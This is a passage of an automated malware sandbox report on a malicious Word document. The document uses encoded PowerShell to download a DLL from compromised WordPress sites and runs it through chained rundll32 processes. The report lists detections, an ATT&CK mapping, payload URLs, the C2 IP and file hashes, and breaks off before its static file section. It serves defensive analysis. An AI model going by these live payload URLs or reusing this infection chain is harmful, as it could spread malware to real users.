                      Source: Yara matchFile source: 18.2.rundll32.exe.3d0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.220000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.230000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.230000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.3a0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.2f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.3b0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.240000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.240000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.3a0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.1b0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.240000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.470000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.220000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.240000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.2a0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.2a0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.1b0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.20a0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.260000.1.unpack, type: UNPACKEDPE

                      Mitre Att&ck Matrix

                      The matrix is listed here by tactic column. A number after a technique name is the counter attached to that cell in the original matrix; techniques without a number are the unflagged background cells of the standard matrix.

                      Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
                      Execution: Windows Management Instrumentation 11; Scripting 32; Native API 1; Exploitation for Client Execution 3; Command and Scripting Interpreter 211; PowerShell 4; Scheduled Task; Command and Scripting Interpreter; PowerShell; AppleScript
                      Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux); At (Windows)
                      Privilege Escalation: Process Injection 11; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux); At (Windows)
                      Defense Evasion: Disable or Modify Tools 1; Deobfuscate/Decode Files or Information 3; Scripting 32; Obfuscated Files or Information 1; Software Packing 1; Masquerading 21; Virtualization/Sandbox Evasion 2; Process Injection 11; Hidden Files and Directories 1; Rundll32 1
                      Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
                      Discovery: System Time Discovery 1; File and Directory Discovery 2; System Information Discovery 26; Security Software Discovery 31; Virtualization/Sandbox Evasion 2; Process Discovery 1; Remote System Discovery 1; Network Service Scanning; System Network Connections Discovery; Process Discovery
                      Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot; Software Deployment Tools; Taint Shared Content
                      Collection: Archive Collected Data 1; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
                      Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol
                      Command and Control: Ingress Tool Transfer 12; Encrypted Channel 2; Non-Application Layer Protocol 2; Application Layer Protocol 12; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols
                      Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols; Rogue Cellular Base Station
                      Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
                      Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue; Data Destruction; Data Encrypted for Impact

                      Behavior Graph

                      Behavior Graph ID: 336501; Sample: bestand-8881014518 00944.doc; Startdate: 06/01/2021; Architecture: WINDOWS; Score: 100
                      Top-level signatures: Multi AV Scanner detection for domain / URL; Antivirus detection for URL or domain; Multi AV Scanner detection for submitted file; 12 other signatures

                      Process tree recovered from the graph (numbers in parentheses are the node counters shown in the original graph):
                      WINWORD.EXE (293, 25) started
                      cmd.exe started; signatures: Suspicious powershell command line found; Very long command line found; Encrypted powershell cmdline option found; PowerShell case anomaly found
                        powershell.exe (12, 9) started by cmd.exe; network: petafilm.com 176.53.69.151, 49165, 80, RADORETR, Turkey; dropped file: C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll, PE32; signature: Powershell drops PE file
                          rundll32.exe started by powershell.exe
                            rundll32.exe (15) started; signature: Hides that the sample has been downloaded from the Internet (zone.identifier)
                              rundll32.exe (5) started; signature: Hides that the sample has been downloaded from the Internet (zone.identifier). This step repeats six times in the graph, each rundll32.exe starting the next one and each carrying the same signature.
                        msg.exe started by cmd.exe

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      Source | Detection | Scanner | Label
                      bestand-8881014518 00944.doc | 32% | Virustotal |
                      bestand-8881014518 00944.doc | 48% | ReversingLabs | Document-Word.Trojan.Heuristic

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

Source | Detection | Scanner | Label
16.2.rundll32.exe.230000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
7.2.rundll32.exe.260000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
18.2.rundll32.exe.3d0000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
17.2.rundll32.exe.210000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
9.2.rundll32.exe.3a0000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
8.2.rundll32.exe.240000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
11.2.rundll32.exe.400000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
12.2.rundll32.exe.2a0000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
13.2.rundll32.exe.2a0000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
15.2.rundll32.exe.20a0000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
10.2.rundll32.exe.210000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
14.2.rundll32.exe.260000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen

                      Domains

Source | Detection | Scanner | Label
petafilm.com | 6% | Virustotal | -

                      URLs

Source | Detection | Scanner | Label
http://petafilm.com | 6% | Virustotal | -
http://petafilm.com | 0% | Avira URL Cloud | safe
http://www.icra.org/vocabulary/. | 0% | URL Reputation | safe
http://zieflix.teleskopstore.com/cgi-bin/Gt3S/ | 0% | Avira URL Cloud | safe
https://somanap.com/wp-admin/P/ | 0% | Avira URL Cloud | safe
https://fnjbq.com/wp-includes/rlR/ | 100% | Avira URL Cloud | malware
http://wap.zhonglisc.com/wp-includes/QryCB/ | 100% | Avira URL Cloud | malware
http://petafilm.com/wp-admin/4m/ | 100% | Avira URL Cloud | malware
http://www.%s.comPA | 0% | URL Reputation | safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | 0% | URL Reputation | safe
https://sakhisuhaninarijeevika.com/wp-includes/CvGUjvE/ | 100% | Avira URL Cloud | malware
http://givingthanksdaily.com/qlE/VeF/ | 0% | Avira URL Cloud | safe

                      Domains and IPs

                      Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
petafilm.com | 176.53.69.151 | true | true | - | unknown

                      Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://petafilm.com/wp-admin/4m/ | true | Avira URL Cloud: malware | unknown

                      URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check | rundll32.exe, 00000006.00000002.2101488871.0000000001DA7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2096617113.0000000000AF7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2097977545.0000000001F07000.00000002.00000001.sdmp | false | - | high
http://www.windows.com/pctv. | rundll32.exe, 00000008.00000002.2097194758.0000000001D20000.00000002.00000001.sdmp | false | - | high
http://investor.msn.com | rundll32.exe, 00000006.00000002.2101148433.0000000001BC0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2095917337.0000000000910000.00000002.00000001.sdmp | false | - | high
http://www.msnbc.com/news/ticker.txt | rundll32.exe, 00000006.00000002.2101148433.0000000001BC0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2095917337.0000000000910000.00000002.00000001.sdmp | false | - | high
http://petafilm.com | powershell.exe, 00000005.00000002.2102033680.0000000003A65000.00000004.00000001.sdmp | true | 6% Virustotal; Avira URL Cloud: safe | unknown
http://www.icra.org/vocabulary/. | rundll32.exe, 00000006.00000002.2101488871.0000000001DA7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2096617113.0000000000AF7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2097977545.0000000001F07000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | powershell.exe, 00000005.00000002.2094280611.0000000002390000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2099067500.00000000027A0000.00000002.00000001.sdmp | false | - | high
http://zieflix.teleskopstore.com/cgi-bin/Gt3S/ | powershell.exe, 00000005.00000002.2101156102.0000000003734000.00000004.00000001.sdmp | true | Avira URL Cloud: safe | unknown
https://somanap.com/wp-admin/P/ | powershell.exe, 00000005.00000002.2101156102.0000000003734000.00000004.00000001.sdmp | true | Avira URL Cloud: safe | unknown
http://investor.msn.com/ | rundll32.exe, 00000006.00000002.2101148433.0000000001BC0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2095917337.0000000000910000.00000002.00000001.sdmp | false | - | high
https://fnjbq.com/wp-includes/rlR/ | powershell.exe, 00000005.00000002.2101156102.0000000003734000.00000004.00000001.sdmp | true | Avira URL Cloud: malware | unknown
http://wap.zhonglisc.com/wp-includes/QryCB/ | powershell.exe, 00000005.00000002.2101156102.0000000003734000.00000004.00000001.sdmp | true | Avira URL Cloud: malware | unknown
http://www.%s.comPA | powershell.exe, 00000005.00000002.2094280611.0000000002390000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2099067500.00000000027A0000.00000002.00000001.sdmp | false | URL Reputation: safe | low
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | rundll32.exe, 00000006.00000002.2101488871.0000000001DA7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2096617113.0000000000AF7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2097977545.0000000001F07000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.hotmail.com/oe | rundll32.exe, 00000006.00000002.2101148433.0000000001BC0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2095917337.0000000000910000.00000002.00000001.sdmp | false | - | high
https://sakhisuhaninarijeevika.com/wp-includes/CvGUjvE/ | powershell.exe, 00000005.00000002.2101156102.0000000003734000.00000004.00000001.sdmp | true | Avira URL Cloud: malware | unknown
http://givingthanksdaily.com/qlE/VeF/ | powershell.exe, 00000005.00000002.2101156102.0000000003734000.00000004.00000001.sdmp | true | Avira URL Cloud: safe | unknown

                                    Contacted IPs


                                    Public

IP | Domain | Country | ASN | ASN Name | Malicious
176.53.69.151 | unknown | Turkey | 42926 | RADORETR | true

                                    General Information

                                    Joe Sandbox Version:31.0.0 Red Diamond
                                    Analysis ID:336501
                                    Start date:06.01.2021
                                    Start time:08:52:42
                                    Joe Sandbox Product:CloudBasic
                                    Overall analysis duration:0h 11m 25s
                                    Hypervisor based Inspection enabled:false
                                    Report type:light
                                    Sample file name:bestand-8881014518 00944.doc
                                    Cookbook file name:defaultwindowsofficecookbook.jbs
                                    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed:20
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • HDC enabled
                                    • GSI enabled (VBA)
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Detection:MAL
                                    Classification:mal100.troj.expl.evad.winDOC@34/8@1/1
                                    EGA Information:Failed
                                    HDC Information:
                                    • Successful, ratio: 93% (good quality ratio 89.5%)
                                    • Quality average: 75%
                                    • Quality standard deviation: 25.5%
                                    HCA Information:
                                    • Successful, ratio: 93%
                                    • Number of executed functions: 0
                                    • Number of non-executed functions: 0
                                    Cookbook Comments:
                                    • Adjust boot time
                                    • Enable AMSI
                                    • Found application associated with file extension: .doc
                                    • Found Word or Excel or PowerPoint or XPS Viewer
                                    • Found warning dialog
                                    • Click Ok
                                    • Attach to Office via COM
                                    • Scroll down
                                    • Close Viewer
                                    Warnings:
                                    • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
                                    • TCP Packets have been reduced to 100
                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtQueryAttributesFile calls found.

                                    Simulations

                                    Behavior and APIs

Time | Type | Description
08:53:40 | API Interceptor | 1x Sleep call for process: msg.exe modified
08:53:41 | API Interceptor | 23x Sleep call for process: powershell.exe modified
08:53:44 | API Interceptor | 291x Sleep call for process: rundll32.exe modified

                                    Joe Sandbox View / Context

                                    IPs

Match | Associated Sample Name / URL | Detection | Context
176.53.69.151 | pack 2254794.doc | malicious | petafilm.com/wp-admin/4m/
176.53.69.151 | informazioni-0501-012021.doc | malicious | petafilm.com/wp-admin/4m/
176.53.69.151 | rapport 40329241.doc | malicious | petafilm.com/wp-admin/4m/
176.53.69.151 | Dati_012021_688_89301.doc | malicious | petafilm.com/wp-admin/4m/
176.53.69.151 | 2199212_20210105_160680.doc | malicious | petafilm.com/wp-admin/4m/
176.53.69.151 | ARCHIVO_FILE.doc | malicious | petafilm.com/wp-admin/4m/
176.53.69.151 | doc_X_13536.doc | malicious | petafilm.com/wp-admin/4m/
176.53.69.151 | ytgeKMQNL2.doc | malicious | petafilm.com/wp-admin/4m/

                                    Domains

Match | Associated Sample Name / URL | Detection | Context
petafilm.com | pack 2254794.doc | malicious | 176.53.69.151
petafilm.com | informazioni-0501-012021.doc | malicious | 176.53.69.151
petafilm.com | rapport 40329241.doc | malicious | 176.53.69.151
petafilm.com | Dati_012021_688_89301.doc | malicious | 176.53.69.151
petafilm.com | 2199212_20210105_160680.doc | malicious | 176.53.69.151
petafilm.com | ARCHIVO_FILE.doc | malicious | 176.53.69.151
petafilm.com | doc_X_13536.doc | malicious | 176.53.69.151
petafilm.com | ytgeKMQNL2.doc | malicious | 176.53.69.151

                                    ASN

Match | Associated Sample Name / URL | Detection | Context
RADORETR | pack 2254794.doc | malicious | 176.53.69.151
RADORETR | ST_Heodo_ST_2021-01-05_19-42-11-017.eml_20210105Rechnung.doc_analyze.doc | malicious | 185.225.36.38
RADORETR | informazioni-0501-012021.doc | malicious | 176.53.69.151
RADORETR | N.11389944 BS 05 gen 2021.doc | malicious | 185.225.36.38
RADORETR | PSX7103491.doc | malicious | 185.225.36.38
RADORETR | Beauftragung.doc | malicious | 185.225.36.38
RADORETR | rapport 40329241.doc | malicious | 176.53.69.151
RADORETR | Dati_012021_688_89301.doc | malicious | 176.53.69.151
RADORETR | 2199212_20210105_160680.doc | malicious | 176.53.69.151
RADORETR | #U00e0#U00a4#U00ac#U00e0#U00a5#U20ac#U00e0#U00a4#U0153#U00e0#U00a4#U2022.doc | malicious | 185.225.36.38
RADORETR | ARCHIVO_FILE.doc | malicious | 176.53.69.151
RADORETR | doc_X_13536.doc | malicious | 176.53.69.151
RADORETR | ytgeKMQNL2.doc | malicious | 176.53.69.151
RADORETR | vrhiyc.exe | malicious | 46.45.148.196
RADORETR | ucrcdh.exe | malicious | 46.45.148.196
RADORETR | lrbwh.exe | malicious | 46.45.148.196
RADORETR | ECS9522020111219400053_19280.exe | malicious | 46.235.9.150
RADORETR | BdBdbczoqd.exe | malicious | 185.84.181.88
RADORETR | N89uC6re8k.exe | malicious | 185.84.181.89
RADORETR | SUmXCDNE9J.exe | malicious | 185.84.181.88

                                    JA3 Fingerprints

                                    No context

                                    Dropped Files

                                    No context

                                    Created / dropped Files

                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{1BCD43F3-025D-4403-9DBE-B492A11253DC}.tmp
                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):1024
                                    Entropy (8bit):0.05390218305374581
                                    Encrypted:false
                                    SSDEEP:3:ol3lYdn:4Wn
                                    MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                    SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                    SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                    SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                    Malicious:false
                                    Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                    C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-966771315-3019405637-367336477-1006\f554348b930ff81505ce47f7c6b7d232_ea860e7a-a87f-4a88-92ef-38f744458171
                                    Process:C:\Windows\SysWOW64\rundll32.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):46
                                    Entropy (8bit):1.0424600748477153
                                    Encrypted:false
                                    SSDEEP:3:/lbWwWl:sZ
                                    MD5:3B7B4F5326139F48EFA0AAE509E2FE58
                                    SHA1:209A1CE7AF7FF28CCD52AE9C8A89DEE5F2C1D57A
                                    SHA-256:D47B073BF489AB75A26EBF82ABA0DAB7A484F83F8200AB85EBD57BED472022FC
                                    SHA-512:C99D99EA71E54629815099464A233E7617E4E118DD5B2A7A32CF41141CB9815DF47B0A40D1A9F89980C307596B53DD63F76DD52CF10EE21F47C635C5F68786B5
                                    Malicious:false
                                    Preview: ........................................user.
                                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\bestand-8881014518 00944.LNK
                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:14 2020, mtime=Wed Aug 26 14:08:14 2020, atime=Wed Jan 6 15:53:37 2021, length=173568, window=hide
                                    Category:dropped
                                    Size (bytes):2168
                                    Entropy (8bit):4.54309093642631
                                    Encrypted:false
                                    SSDEEP:24:86/XTd6jFyG0lZ4eilZ5Dv3q8dM7dD26/XTd6jFyG0lZ4eilZ5Dv3q8dM7dV:86/XT0jFVI4vQ8Qh26/XT0jFVI4vQ8Q/
                                    MD5:95ABC75A1ECBD2FAE79C247DBAD5FC65
                                    SHA1:3963DE2F7328DCDF39BC6B89C501651D148B2FC5
                                    SHA-256:5B3D441BB63120846C0762E386C41B5C0054CEE56829CD8C45135ECC5B5D4218
                                    SHA-512:1E65F5B076E737D240EDC77B7488049DF8113FE071B0DEAF13673AB957CED764804A8B0CEEE18C65470BC983350DAEB3A8737E69E9FD70432171BC9C94F31CC3
                                    Malicious:false
                                    Preview: L..................F.... ......{.....{...Y>zL................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.....&R.. .BESTAN~1.DOC..f.......Q.y.Q.y*...8.....................b.e.s.t.a.n.d.-.8.8.8.1.0.1.4.5.1.8. .0.0.9.4.4...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\910646\Users.user\Desktop\bestand-8881014518 00944.doc.3.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.b.e.s.t.a.n.d.-.8.8.8.1.0.1.4.5.1.8. .0.0.9.4.4...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......
                                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):110
                                    Entropy (8bit):4.442723495351642
                                    Encrypted:false
                                    SSDEEP:3:M1GhURBoPFofzihURBoPFomX1GhURBoPFov:MfcPFUFcPFtcPFy
                                    MD5:C0B69DCA42D8A513A96503BEBEAAC89D
                                    SHA1:6C7CAF13C3D8875D0B039031F1D1A0B7940C5A4D
                                    SHA-256:866AE52778733870E7DA8ECCDDAF8A261F836B8692050D2A7B6125D34B849CED
                                    SHA-512:BFE68194C1358B09FCF1D29CD7B3E94B891A900E0A94928D592E4F3271E3A36D917E50FB2BC581626A2D70CD01ED6557CBF1DCDC77F9F213366E5E9BFC06CC7D
                                    Malicious:false
                                    Preview: [doc]..bestand-8881014518 00944.LNK=0..bestand-8881014518 00944.LNK=0..[doc]..bestand-8881014518 00944.LNK=0..
                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):162
                                    Entropy (8bit):2.431160061181642
                                    Encrypted:false
                                    SSDEEP:3:vrJlaCkWtVy3KGcils6w7Adtln:vdsCkWthGciWfQl
                                    MD5:4A5DFFE330E8BBBF59615CB0C71B87BE
                                    SHA1:7B896C17F93ECFC9B69E84FC1EADEDD9DA550C4B
                                    SHA-256:D28616DC54FDEF1FF5C5BA05A77F178B7E3304493BAF3F4407409F2C84F4F215
                                    SHA-512:3AA160CB89F4D8393BCBF9FF4357FFE7AE00663F21F436D341FA4F5AD4AEDC737092985EB4A94A694A02780597C6375D1615908906A6CEC6D7AB616791B6285C
                                    Malicious:false
                                    Preview: .user..................................................A.l.b.u.s.............p.......................................P.....................z...............x...
                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\KID2W9UHV84RRRS8AHDL.temp
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):8016
                                    Entropy (8bit):3.5885254735299674
                                    Encrypted:false
                                    SSDEEP:96:chQCsMq+qvsqvJCwomz8hQCsMq+qvsEHyqvJCworczvlYbHFf8OQlUVoIu:cyDomz8yXHnorczvef8O0Iu
                                    MD5:0A595C9B355BD03FD92A3F7F14507F20
                                    SHA1:A198741D16122F40564B52844F4F1B0F1E97FA1A
                                    SHA-256:A0875BA8870F27E85A4CFAE05C773ADB7B14B4F5B38FE076EBADBA07EB90B805
                                    SHA-512:C9DBABE0033FC2CBF3B95DA0F4F7BE0C472A15F6BCA0841F7A45E968F12D38E7E1265F142F7F8CF2E9B8D5FE56A197B09850DB74515D0D04F6C0401836CC5993
                                    Malicious:false
                                    Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                    C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):192000
                                    Entropy (8bit):7.470368045221206
                                    Encrypted:false
                                    SSDEEP:3072:SwbpDnn9F4rNyVBYF0n3ajFq4weCp2S2MJdhzybMO8dSySA:Ssl9F8aBYF0nVp2MJHybR8dS9
                                    MD5:009380116F3429BA6F236D199F418B98
                                    SHA1:292360D762524AD98FADDB735BB58AB3DABA5327
                                    SHA-256:323F6431FB274E90DC003E567C54CB5E2327E9408F903E49CC6F3E840BF9BCF6
                                    SHA-512:5D086691A8109091C847B690E905D0BDEACE03E0A295F120F0231B4A7ADC3EC45A77FF626DD9EA792BBD32EA02909CAC2EBF255D7155011244978927F4E1645C
                                    Malicious:true
                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........:..wT..wT..wT......wT.....wT......wT.-....wT.-....wT..wU.SwT.-....wT......wT......wT......wT..w...wT......wT.Rich.wT.........PE..L......_...........!.........J.......E.......................................0.......................................................P.. ...............................8...............................@............................................text............................... ..`.rdata...J.......L..................@..@.data....-... ......................@....rsrc... ....P......................@..@.reloc..H...........................@..B........................................................................................................................................................................................................................................................................................................
                                    C:\Users\user\Desktop\~$stand-8881014518 00944.doc
                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):162
                                    Entropy (8bit):2.431160061181642
                                    Encrypted:false
                                    SSDEEP:3:vrJlaCkWtVy3KGcils6w7Adtln:vdsCkWthGciWfQl
                                    MD5:4A5DFFE330E8BBBF59615CB0C71B87BE
                                    SHA1:7B896C17F93ECFC9B69E84FC1EADEDD9DA550C4B
                                    SHA-256:D28616DC54FDEF1FF5C5BA05A77F178B7E3304493BAF3F4407409F2C84F4F215
                                    SHA-512:3AA160CB89F4D8393BCBF9FF4357FFE7AE00663F21F436D341FA4F5AD4AEDC737092985EB4A94A694A02780597C6375D1615908906A6CEC6D7AB616791B6285C
                                    Malicious:false
                                    Preview: .user..................................................A.l.b.u.s.............p.......................................P.....................z...............x...

                                    Static File Info

                                    General

